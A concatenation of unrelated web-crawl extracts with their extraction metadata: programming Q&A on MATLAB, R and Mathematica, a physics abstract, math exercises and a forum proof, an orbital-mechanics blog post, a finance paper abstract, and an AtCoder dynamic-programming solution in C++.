variable “B” when trying to find zeros of a function I'm having a little trouble evaluating B in the function bidfn. More specifically, I have been unable to find the zeroes of C from the nested function ptesta. Just for some context, Dmr is the ... ## Implicit Euler method Consider the initial value problem The formula for the backward Euler method is given by the formula: for a uniform partition of [a,b] with step h=(b-a)/N with ρ=0. At each step we will have to ... 10 hours ago by evinda on stackoverflow.com ## Function name conflict. How to call a MATLAB toolbox function instead an user-defined function I have a problem that I could solve by changing my function's name. But I want to know if there's an option to call a MATLAB-defined function which has the same name of my user-defined function. By ... 2 answers | 10 hours ago by Vitrion on stackoverflow.com ## Matlab: crop image with a sliding window? does anybody know how to crop an image with a sliding window in Matlab? e.g. I have an image of 1000x500 pixels, I would like to crop from this image blocks of 50x50 pixels... Of course I have to ... ## Constrained Local Model (CLM) – How can I compute the response map I try to implement a facial feature detector with a CLM following the paper of Cootes et. al. ('Feature Detection and Tracking with Constrained Local Models' and 'Automatic feature localization with ... ## Custom Matlab chi-square for 50 numbers Do you know if it is possible to create a custom Matlab chi-square function for 50 numerical values, ordered in a single column? Because I do not need the in-built one and I need to carry out a ... 1 answers | 10 hours ago by Atanas on stackoverflow.com ## Matlab Fspecial Filtering an Image How can I use fspecial to apply an averaging filter to the image clown? I have loaded the clown image into matlab and I have written h=fspecial('average', 3). Now how do I use h to apply the ... 2 answers | 10 hours ago by jerry2144 on stackoverflow.com ## How can rectangular bounding box from regionprops(Image,'BoundingBox') in Matlab? I want to make a bounding box around a person in an image, I tried different methods but I couldn't get the solution that I want. Here's the image I am using: Here's the code I have written so ...
2015-03-27 08:38:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5068457126617432, "perplexity": 1183.4041920977318}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-14/segments/1427131295993.24/warc/CC-MAIN-20150323172135-00020-ip-10-168-14-71.ec2.internal.warc.gz"}
http://cpr-condmat-suprcon.blogspot.com/2013/05/13054427-takuya-nomoto-et-al.html
## Effect of magnetic criticality and Fermi-surface topology on the magnetic penetration depth    [PDF] Takuya Nomoto, Hiroaki Ikeda We investigate the effect of anti-ferromagnetic (AF) quantum criticality on the magnetic penetration depth $\lambda(T)$ in line-nodal superconductors, including the cuprates, the iron pnictides, and the heavy-fermion superconductors. The critical magnetic fluctuation renormalizes the current vertex and drastically enhances zero-temperature penetration depth $\lambda(0)$, which is more remarkable in the iron-pnictide case due to the Fermi-surface topology. Additional temperature ($T$) dependence of the current renormalization makes the expected $T$-linear behavior at low temperatures approaching to $T^{1.5}$ asymptotically. These anomalous behaviors are well consistent with experimental observations. We stress that $\lambda(T)$ is a good probe to detect the AF quantum critical point in the superconducting state. View original: http://arxiv.org/abs/1305.4427
2017-08-23 04:17:39
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7376086115837097, "perplexity": 3444.1285884540066}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886117519.92/warc/CC-MAIN-20170823035753-20170823055753-00199.warc.gz"}
https://www.biostars.org/p/438641/
Trouble using get_raw() function in crossmeta R package to extract GEO data for differential expression analysis 0 0 Entering edit mode 13 months ago Hello, I am attempting to perform meta-analysis from gene expression omnibus (GEO) data with crossmeta r package in bioconductor My issue is that when I attempt to download/unzip the GEO raw data with get_raw() function, I face an error demonstrated below (here I am simply attempting analysis from the vignette to troubleshoot) library(crossmeta) data_dir <- file.path(getwd()) # gather all GSEs gse_names <- c("GSE9601", "GSE15069", "GSE50841", "GSE34817", "GSE29689") # gather Illumina GSEs (see 'Checking Raw Illumina Data') illum_names <- c("GSE50841", "GSE34817", "GSE29689") get_raw(gse_names, data_dir) which returns the following for every series in gse_names: https://ftp.ncbi.nlm.nih.gov/geo/series/GSE9nnn/GSE9601/suppl/ No supplemental files found. Check URL manually if in doubt https://ftp.ncbi.nlm.nih.gov/geo/series/GSE9nnn/GSE9601/suppl/ This is despite the fact that supplemental files for all of these series (GSEs) do exist. I have attempted this on other series as well to no avail. Any assistance would be much appreciated. Additional note: the function getGEOSuppFiles (from GEOquery package) is used in the source code for get_raw() and getGEOSuppFiles() works completely fine. R crossmeta meta-analysis gene-expression • 397 views 0 Entering edit mode Exactly, same problem I am facing. Anybody's help would be much appreciated
2021-06-22 13:45:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3950970768928528, "perplexity": 11365.580574319425}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488517820.68/warc/CC-MAIN-20210622124548-20210622154548-00285.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-4-polynomials-4-7-polynomials-in-several-variables-4-7-exercise-set-page-283/12
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition) Published by Pearson # Chapter 4 - Polynomials - 4.7 Polynomials in Several Variables - 4.7 Exercise Set: 12 #### Answer $85$ #### Work Step by Step Substitute the given values of the variables to obtain: $x^2+5y^2-4xy \\=5^2+5(-2)^2-4(5)(-2) \\=25+5(4)-(-40) \\=25+20+40 \\=85$ After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback.
2018-08-19 22:03:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7209888696670532, "perplexity": 2898.860499198831}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221215393.63/warc/CC-MAIN-20180819204348-20180819224348-00654.warc.gz"}
http://mathhelpforum.com/math-challenge-problems/90074-techniques-integration-6-a.html
1. Techniques of integration (6) Let $f: \mathbb{R} \longrightarrow \mathbb{R}$ be continuous and periodic with period $T > 0.$ For any real numbers $a evaluate $\lim_{n\to\infty} \int_a^b f(nx) \ dx.$ 2. Originally Posted by NonCommAlg Let $f: \mathbb{R} \longrightarrow \mathbb{R}$ be continuous and periodic with period $T > 0.$ For any real numbers $a evaluate $\lim_{n\to\infty} \int_a^b f(nx) \ dx.$ Hi NonCommAlg. A continuous function is integrable, and the integral over a bounded interval of an integrable periodic function is bounded. Hence, using the substitution $u=nx,$ $\lim_{n\,\to\,\infty}\int_a^bf(nx)\,dx$ $=\ \ \lim_{n\,\to\,\infty}\frac1n\int_{na}^{nb}f(u)\,du$ $=\ \ 0$ since the integral is bounded Something tells me I may have done something wrong, because, well, surely it can’t be that simple … 3. Originally Posted by TheAbstractionist Hi NonCommAlg. A continuous function is integrable, and the integral over a bounded interval of an integrable periodic function is bounded. Hence, using the substitution $u=nx,$ $\lim_{n\,\to\,\infty}\int_a^bf(nx)\,dx$ $=\ \ \lim_{n\,\to\,\infty}\frac1n\int_{na}^{nb}f(u)\,du$ I'd agree with that approach up to that point, but I wouldn't go on to say that the limit is 0, because the length of the interval (in the u-integral) is getting unboundedly long. Let $f_{\text{av}} = \frac1T\int_0^Tf(x)\,dx$ be the mean value of f over one period. Then the interval [na,nb] consists of $\frac{n(b-a)}T$ subintervals of length T (not counting odd bits at the ends, which we can dispose of with epsilons). So $\frac1n\int_{na}^{nb}f(u)\,du\approx (b-a)f_{\text{av}}$. That's my candidate for the limit. 4. Originally Posted by Opalg I'd agree with that approach up to that point, but I wouldn't go on to say that the limit is 0, because the length of the interval (in the u-integral) is getting unboundedly long. Aha, that was where I went wrong. I knew I had made a mistake somewhere but just couldn’t see where. Thanks, Opalg. 5. Originally Posted by Opalg I'd agree with that approach up to that point, but I wouldn't go on to say that the limit is 0, because the length of the interval (in the u-integral) is getting unboundedly long. Let $f_{\text{av}} = \frac1T\int_0^Tf(x)\,dx$ be the mean value of f over one period. Then the interval [na,nb] consists of $\frac{n(b-a)}T$ subintervals of length T (not counting odd bits at the ends, which we can dispose of with epsilons). So $\frac1n\int_{na}^{nb}f(u)\,du\approx (b-a)f_{\text{av}}$. That's my candidate for the limit. Opalg's candidate, which is $\frac{b-a}{T} \int_0^T f(x) \ dx,$ is the correct answer. here's a more detailed solution: $\int_a^b f(nx) \ dx = \frac{1}{n} \int_{na}^{nb} f(u) \ du= \frac{1}{n} \left[\sum_{k=0}^{m-1} \int_{na+kT}^{na+(k+1)T} f(u) \ du + \int_{na+mT}^{nb} f(u) \ du \right],$ where $na+mT < b \leq na+(m+1)T. \ \ \ \ \ (1)$ but $\int_{na+kT}^{na+(k+1)T} f(u) \ du =\int_0^T f(u) \ du,$ since $T$ is the period of $f.$ thus: $\int_a^b f(nx) \ dx = \frac{m}{n} \int_0^T f(u) \ du + \frac{1}{n}\int_{na+mT}^{nb} f(u) \ du. \ \ \ (2)$ we also from (1) have that $\lim_{n\to\infty}\frac{m}{n}=\frac{b-a}{T},$ which completes the proof because $f$ is bounded, say by $K,$ and thus: $\left| \frac{1}{n} \int_{na+mT}^{nb} f(u) \ du \right| \leq(nb-na-mT)\frac{K}{n}=\left(\frac{b-a}{T}-\frac{m}{n} \right) \frac{K}{T}.$ hence: $\lim_{n\to\infty} \frac{1}{n} \int_{na+mT}^{nb} f(u) \ du =0,$ and the result follows from (2).
2016-12-04 15:32:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 33, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9779096841812134, "perplexity": 306.0106315682325}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-50/segments/1480698541322.19/warc/CC-MAIN-20161202170901-00314-ip-10-31-129-80.ec2.internal.warc.gz"}
https://blog.poliastro.space/2020/06/28/2020-06-28-What-we'-ve-been-working-on-these-days!/
You are seeing poliastro blog. If you want to see documentation, the latest version can be found in docs.poliastro.space. # What we've been working on these days! Hey, folks! I hope everyone is okay out there. Today, I am going to explain a little bit about Repeat ground track orbits, and the value that lies behind. Orbits with repeating ground tracks play a significant role in space engineering. Ground tracks that repeat according to any pattern have meaningful applications in remote sensing missions, reconnaissance missions, and numerous rendezvous and docking opportunities with an orbiting spacecraft. Since they overfly the same points on the planet’s surface every repeat cycle, such as those studying gravity, the atmosphere, or the movement of the polar ice cap. So as you might imagine, this is amazing. In one way, the data we consume relies on these orbits. As mentioned before, Repeat ground track (RGT) orbits allows a satellite to reobserve the same area after a repeat cycle. # So how do we do it? RGT is usually specified by an integer number of days N and an integer number of orbits K in the repeat cycle. So after acknowledging how the user wants the repeat ground track orbit. We calculate the mean semimajor axis,a, required for a repeating ground track orbit using an algorithm devised by Carl Wagner. And we iterate on a until we find the desired approximation. For further information, refer to Fundamentals of Astrodynamics and Applications, 4th ed by David A. Vallado. This algorithm starts with the following initial guess for the required mean semimajor axis: $$a_{o}= \mu^\frac{1}{3}[(\frac{R}{D})\omega_{b}]^{-\frac{2}{3}}$$ And iteratively improves the semi-major axis with the following update: $$a_{i+1}= \mu^\frac{1}{3}[(\frac{R}{D})\omega_{b}]^{-\frac{2}{3}}[1-\frac{3}{2}J_{2}(\frac{r_{bq}}{a_{i}})^2(1-\frac{3}{2}\sin(i)^2)]^\frac{2}{3}[1+J_{2}(\frac{r_{bq}}{a_{i}})^2(\frac{3}{2}\frac{R}{D}\cos(i)-\frac{3}{4}(5\cos(i)^2-1))]^\frac{2}{3}$$ Where: $R$ = Integer number of orbits $D$ = Integer number of days $J_{2}$ = Second gravity coefficient $\omega_{b}$ = Inertial rotation rate of the Body $r_{qb}$ = Equatorial radius of the Body $i$ = Orbital inclination $\mu$ = Gravitational constant of the Body So do you know any satellite mission that has a repeat ground track orbit? There are just a bunch of them!. Just to mention, ICESat (Ice, Cloud, and land Elevation Satellite), was a satellite mission for measuring ice sheet mass balance, cloud and aerosol heights, as well as land topography and vegetation characteristics. If you visit, National Snow & Ice Data center, you may find some datasets coming from the different versions of ICESat.
2020-07-05 02:42:17
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.46047160029411316, "perplexity": 1694.0908728739382}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655886865.30/warc/CC-MAIN-20200705023910-20200705053910-00343.warc.gz"}
https://mathematica.stackexchange.com/questions/112612/is-it-possible-to-speedup-these-simple-linear-algebra-operations
# Is it possible to speedup these simple linear algebra operations I'm trying to numerically solve some equations using splitting operator method. The solver I construct iteratively constructs a matrix and feeds it to LinearSolve. After profiling with the solver, I found half of the time is spent on simple linear algebra operations before LinearSolve, and I would like to speedup these process if possible. Consider this simple example of matrix operation Needs["CompiledFunctionTools"] Needs["Experimental"] lth = 200; mtx = RandomReal[{0, 1}, {lth, lth}]; ls = RandomReal[{0, 1}, {lth}]; Et = Function[{t}, Sin[(π t)/20] Sin[2 t]]; and I'm trying to construct a matrix IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx), repeatly with different t: Table[ IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx);, {t, 0., 20, 0.01}]; // AbsoluteTiming (* {1.33086, Null} *) As a comparison, LinearSolve is about 2X faster for solving a matrix equation with the same size Table[ LinearSolve[mtx, ls];, {t, 0., 20, 0.01}]; // AbsoluteTiming (* {0.883315, Null} *) So my goal is to speed up the matrix operation, especially considering my matrix operation is much simpler than what is required to solve a dense matrix equation in LinearSolve. We can try to copmile the functions: Etc = Compile[{{t, _Real}}, Et[t], CompilationOptions -> {"InlineCompiledFunctions" -> True, "InlineExternalDefinitions" -> True}]; Htc = Compile[{{t, _Real}}, IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx), CompilationOptions -> {"InlineCompiledFunctions" -> True, "InlineExternalDefinitions" -> True}]; and compare these different ways: Table[ IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx);, {t, 0., 20, 0.01}]; // AbsoluteTiming Table[IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Etc[t]*mtx);, {t, 0., 20, 0.01}]; // AbsoluteTiming Table[Htc[t];, {t, 0., 20, 0.01}]; // AbsoluteTiming (* {1.33086, Null} *) (* {1.29705, Null} *) (* {2.26304, Null} *) We have two observations: 1. We gain only very little speedup in by compiling the function Et. 2. We slow down almost 70% by compiling the whole matrix operations. For the first point, I'm guessing this may due to the automatic compilation of Table. For the second point, we may look at the compiled code of the function Htc "(*omitted*) 1 T(I2)0 = MainEvaluate[ Hold[IdentityMatrix][ I0]] 2 T(R2)2 = MainEvaluate[ Hold[DiagonalMatrix][ T(R1)1]] 3 R1 = R0 4 R5 = I1 5 R3 = Reciprocal[ R5] 6 R5 = R2 * R1 * R3 7 R3 = Sin[ R5] 8 R5 = I2 9 R5 = R5 * R1 10 R6 = Sin[ R5] 11 R3 = R3 * R6 12 T(R2)4 = R3 * T(R2)3 13 T(R2)2 = T(R2)2 + T(R2)4 14 T(C2)4 = C0 * T(R2)2 15 T(C2)2 = CoerceTensor[ I3, T(I2)0]] 16 T(C2)2 = T(C2)2 + T(C2)4 17 Return " We can see that it has two invokes to the MainEvaluate to compute the IdentityMatrix and DiagonalMatrix. So this slowdown may come from the repeatedly invoking of the MainEvaluator, although in the comment here Oleksandr R. pointed out that IdentityMatrix is called using opcode 47 which should give very small overhead. We can try to remove the MainEvaluate completely by expanding the matrix using Silvia's construction (this construction is a workaround for a problem of OptimizedExpression): Htc2 = Compile[{{t, _Real}}, Evaluate[ OptimizeExpression[ Hold[IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx)] /. Et -> EtTemp // ReleaseHold] /. EtTemp[x_] :> With[{val = Et[x]}, val /; True]]]; Table[Htc2[t];, {t, 0., 20, 0.01}]; // AbsoluteTiming (* {5.30743, Null} *) However, we see an almost 2X slowdown for some reasons. We can also try to simplify the matrix operations manually by removing IdentityMatrix, and it gains almost 2X speedup Table[ DiagonalMatrix[1. + I ls] + I Etc[t]*mtx;, {t, 0., 20, 0.01}]; // AbsoluteTiming (* {0.728859, Null} *) But I'm sill wondering: Is it possible to further speedup the matrix operations? version: 10.4 on OS X 10.11.4. Note: This is a follow-up question to the question here.
2019-10-21 11:24:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5436608791351318, "perplexity": 11115.613681090785}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570987769323.92/warc/CC-MAIN-20191021093533-20191021121033-00341.warc.gz"}
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=756125&rec=1&srcabs=970480&alg=7&pos=4
# Portfolio Credit Risk with Extremal Dependence 31 Pages Posted: 15 Jul 2005 See all articles by Achal Bassamboo ## Achal Bassamboo Northwestern University - Department of Managerial Economics and Decision Sciences (MEDS) ## Sandeep Juneja Tata Institute of Fundamental Research (TIFR) ## Assaf Zeevi Columbia Business School - Decision Risk and Operations Date Written: July 1, 2005 ### Abstract We consider the risk of a portfolio comprised of loans, bonds, and financial instruments that are subject to possible default. In particular, we are interested in the probability that the portfolio will incur large losses over a fixed time horizon. Contrary to the normal copula that is commonly used in practice (e.g., in the CreditMetrics system), we assume a portfolio dependence structure that supports {\it extremal dependence} among obligors and does not hinge solely on correlation. A particular instance within this model class is the so-called $t$-copula model that is derived from the multivariate Student $t$ distribution and hence, generalizes the normal copula model. The size of the portfolio, the heterogenous mix of obligors, and the fact that default events are rare and mutually dependent makes it quite complicated to calculate portfolio credit risk either by means of exact analysis or naive Monte Carlo simulation. The main contributions of this paper are twofold. We first derive sharp asymptotics for portfolio credit risk that illustrate the implications of extremal dependence among obligors. Using this as a stepping stone, we develop multi-stage importance sampling algorithms that are shown to be asymptotically optimal and can be used to efficiently compute portfolio credit risk via Monte Carlo simulation. Keywords: Portfolio, credit, asymptotics, simulation, importance sampling, rare events, risk management JEL Classification: C15, G3 Suggested Citation Bassamboo, Achal and Juneja, Sandeep and Zeevi, Assaf, Portfolio Credit Risk with Extremal Dependence (July 1, 2005). Available at SSRN: https://ssrn.com/abstract=756125 or http://dx.doi.org/10.2139/ssrn.756125 Register Downloads 252 Abstract Views 1,734 rank 122,289 PlumX Metrics
2019-10-20 04:49:56
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4223346710205078, "perplexity": 1962.9962070255503}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986702077.71/warc/CC-MAIN-20191020024805-20191020052305-00464.warc.gz"}
https://undergroundmathematics.org/calculus-trig-log/to-the-limit/special-case
### Calculus of Trigonometry & Logarithms We have found that the gradient function of $a^x$ can be written as $f'(x) = a^x\times f'(0),$ i.e. the gradient function is the function itself multiplied by a constant, and this constant is the gradient of $a^x$ at $x = 0$. There will be a special case when $f'(0) = 1$ as then the gradient function of $a^x$ would be itself, $a^x$. Before using the applet, look at the values given. Approximately what value do you think $a$ will take to give $f'(0) \approx 1?$ Use the slider to find the value of $a$ when $f'(0) \approx 1$.
2018-01-17 10:42:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8160043954849243, "perplexity": 195.70146980186303}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084886895.18/warc/CC-MAIN-20180117102533-20180117122533-00763.warc.gz"}
https://io.zouht.com/52.html
# 【题目】Distance Sequence NOMURA Programming Contest 2022(AtCoder Beginner Contest 253) E - Distance Sequence Time Limit: 2 sec / Memory Limit: 1024 MB Score : $500$ points ### Problem Statement How many integer sequences $A=(A_1,\ldots,A_N)$ of length $N$ satisfy all the conditions below? • $1\le A_i \le M$ $(1 \le i \le N)$ • $|A_i - A_{i+1}| \geq K$ $(1 \le i \le N - 1)$ Since the count can be enormous, find it modulo $998244353$. ### Constraints • $2 \leq N \leq 1000$ • $1 \leq M \leq 5000$ • $0 \leq K \leq M-1$ • All values in input are integers. ### Input Input is given from Standard Input in the following format: $N$ $M$ $K$ ### Output Print the count modulo $998244353$. 2 3 1 ### Sample Output 1 6 The following $6$ sequences satisfy the conditions. • $(1,2)$ • $(1,3)$ • $(2,1)$ • $(2,3)$ • $(3,1)$ • $(3,2)$ 3 3 2 ### Sample Output 2 2 The following $2$ sequences satisfy the conditions. • $(1,3,1)$ • $(3,1,3)$ 100 1000 500 ### Sample Output 3 657064711 Print the count modulo $998244353$. ### 我的笔记 $$dp[i+1][j]=(dp[i][1]+\dots+dp[i][j-K])+(dp[i][j+K]+\dots+dp[i][M])$$ ### 代码 #include <bits/stdc++.h> using namespace std; const int MAXN = 1010, MAXM = 5010, MOD = 998244353; int N, M, K; long long dp[MAXN][MAXM]; long long ps[MAXM]; int main() { cin >> N >> M >> K; for (int i = 1; i <= M; i++) dp[1][i] = 1; for (int i = 2; i <= N; i++) { memset(ps, 0, sizeof(ps)); for (int j = 1; j <= M; j++) { ps[j] = ps[j - 1] + dp[i - 1][j]; ps[j] %= MOD; } for (int j = 1; j <= M; j++) { if (K == 0) { dp[i][j] = ps[M]; continue; } if (j - K >= 1) { dp[i][j] += MOD + ps[j - K] - ps[0]; dp[i][j] %= MOD; } if (j + K <= M) { dp[i][j] += MOD + ps[M] - ps[j + K - 1]; dp[i][j] %= MOD; } } } long long ans = 0; for (int i = 1; i <= M; i++) { ans += dp[N][i]; ans %= MOD; } cout << ans << endl; return 0; }
2022-07-05 11:56:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4604155421257019, "perplexity": 9528.708825369122}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104576719.83/warc/CC-MAIN-20220705113756-20220705143756-00660.warc.gz"}
http://www.dimacs.rutgers.edu/Workshops/Microsurveys/abstracts.html
